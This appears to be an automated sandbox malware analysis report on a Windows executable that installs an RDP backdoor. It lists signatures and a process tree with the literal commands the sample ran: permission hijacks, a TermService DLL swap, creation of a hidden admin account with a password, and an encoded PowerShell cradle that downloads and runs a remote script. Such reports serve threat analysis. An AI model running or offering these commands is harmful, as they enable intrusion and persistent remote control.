Analysis
-
max time kernel
136s -
max time network
129s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
12-11-2020 14:16
Static task
static1
Behavioral task
behavioral1
Sample
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
Resource
win10v20201028
General
-
Target
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe
-
Size
3.4MB
-
MD5
a8d7894060ed9e3a80de995fcbf81864
-
SHA1
8ed59a83db92328d05ec05af58f2b4e259be3af4
-
SHA256
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98
-
SHA512
5e66992066cf9e0a698cf1271068a5c73aa0f8769b4b712317e528b8da83ca1780a730e72e19c4c20358b351e44692bfb6a957a0e782873063597baa3d97fa59
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 7 948 powershell.exe 9 948 powershell.exe 11 948 powershell.exe 12 948 powershell.exe 14 948 powershell.exe 16 948 powershell.exe 18 948 powershell.exe 20 948 powershell.exe 22 948 powershell.exe 24 948 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1580 icacls.exe 1644 icacls.exe 1688 icacls.exe 1060 icacls.exe 1292 icacls.exe 1420 takeown.exe 432 icacls.exe 1540 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1340 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1616 1616 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1292 icacls.exe 1420 takeown.exe 432 icacls.exe 1540 icacls.exe 1580 icacls.exe 1644 icacls.exe 1688 icacls.exe 1060 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e5d4789a-4fed-4f8d-8701-811a28cc3bbd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe4df0f1-029a-4c6f-9d3c-09dbee396854 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3C56.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar400A.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FB6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab4009.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3C55.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3D03.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab4049.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_766c3dcd-b6b7-4cb4-8db5-0ebe1a1f3605 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4caa1386-ca6c-42fe-92ca-629b492ff562 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3D62.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3D63.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar404A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FB5.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6134aceb-9b00-473e-aab6-a055eb8726c2 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_35a41d01-beab-4c5b-9bd7-7d1e3ecc8cf3 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FF7.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FF8.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_034df294-e482-4165-a67e-9e13fbfcf5e1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_be019eb4-9622-4f25-9d10-05320a6ae6e6 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33c9dd1a-3dd8-46d3-bd4f-e145ee5cf4ac powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b491d7d6-b03d-4285-ad15-ac8a275d4061 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3FC6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Tar3FC7.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4CW1UWIJIWA8OVL2S0AG.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8dfd443d-9e65-4708-bac1-6b64ab18a284 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\Cab3D02.tmp powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f04c69780fb9d601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 948 powershell.exe 948 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 468 1616 1616 1616 1616 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1340 powershell.exe Token: SeRestorePrivilege 1540 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeAuditPrivilege 1580 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1580 WMIC.exe Token: SeIncreaseQuotaPrivilege 1580 WMIC.exe Token: SeAuditPrivilege 1580 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1688 WMIC.exe Token: SeIncreaseQuotaPrivilege 1688 WMIC.exe Token: SeAuditPrivilege 1688 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1688 WMIC.exe Token: SeIncreaseQuotaPrivilege 1688 WMIC.exe Token: SeAuditPrivilege 1688 WMIC.exe Token: SeDebugPrivilege 948 powershell.exe -
Suspicious use of WriteProcessMemory 127 IoCs
Processes:
689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 308 wrote to memory of 1340 308 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 308 wrote to memory of 1340 308 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 308 wrote to memory of 1340 308 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 308 wrote to memory of 1340 308 689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe powershell.exe PID 1340 wrote to memory of 268 1340 powershell.exe csc.exe PID 1340 wrote to memory of 268 1340 powershell.exe csc.exe PID 1340 wrote to memory of 268 1340 powershell.exe csc.exe PID 268 wrote to memory of 1164 268 csc.exe cvtres.exe PID 268 wrote to memory of 1164 268 csc.exe cvtres.exe PID 268 wrote to memory of 1164 268 csc.exe cvtres.exe PID 1340 wrote to memory of 1420 1340 powershell.exe takeown.exe PID 1340 wrote to memory of 1420 1340 powershell.exe takeown.exe PID 1340 wrote to memory of 1420 1340 powershell.exe takeown.exe PID 1340 wrote to memory of 432 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 432 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 432 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1540 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1540 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1540 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1580 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1580 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1580 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1644 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1644 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1644 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1688 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1688 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1688 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1060 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1060 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1060 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1292 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1292 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 1292 1340 powershell.exe icacls.exe PID 1340 wrote to memory of 760 1340 powershell.exe reg.exe PID 1340 wrote to memory of 760 1340 powershell.exe reg.exe PID 1340 wrote to memory of 760 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1068 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1068 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1068 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1248 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1248 1340 powershell.exe reg.exe PID 1340 wrote to memory of 1248 1340 powershell.exe reg.exe PID 1340 wrote to memory of 956 1340 powershell.exe net.exe PID 1340 wrote to memory of 956 1340 powershell.exe net.exe PID 1340 wrote to memory of 956 1340 powershell.exe net.exe PID 956 wrote to memory of 944 956 net.exe net1.exe PID 956 wrote to memory of 944 956 net.exe net1.exe PID 956 wrote to memory of 944 956 net.exe net1.exe PID 1340 wrote to memory of 1656 1340 powershell.exe cmd.exe PID 1340 wrote to memory of 1656 1340 powershell.exe cmd.exe PID 1340 wrote to memory of 1656 1340 powershell.exe cmd.exe PID 1656 wrote to memory of 1080 1656 cmd.exe cmd.exe PID 1656 wrote to memory of 1080 1656 cmd.exe cmd.exe PID 1656 wrote to memory of 1080 1656 cmd.exe cmd.exe PID 1080 wrote to memory of 1648 1080 cmd.exe net.exe PID 1080 wrote to memory of 1648 1080 cmd.exe net.exe PID 1080 wrote to memory of 1648 1080 cmd.exe net.exe PID 1648 wrote to memory of 1936 1648 net.exe net1.exe PID 1648 wrote to memory of 1936 1648 net.exe net1.exe PID 1648 wrote to memory of 1936 1648 net.exe net1.exe PID 1340 wrote to memory of 1164 1340 powershell.exe cmd.exe PID 1340 wrote to memory of 1164 1340 powershell.exe cmd.exe PID 1340 wrote to memory of 1164 1340 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"C:\Users\Admin\AppData\Local\Temp\689d8b997a921d6a96d82429d40677c13a7652abe4d045549f8c20d18f48ed98.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5agdcg2t\5agdcg2t.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD7E.tmp" "c:\Users\Admin\AppData\Local\Temp\5agdcg2t\CSC977694CB725A4BBD99B4E7E5B7F754.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin dm9djaMi /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin dm9djaMi /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin dm9djaMi /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin dm9djaMi1⤵
-
C:\Windows\system32\net.exenet.exe user updwin dm9djaMi2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin dm9djaMi3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
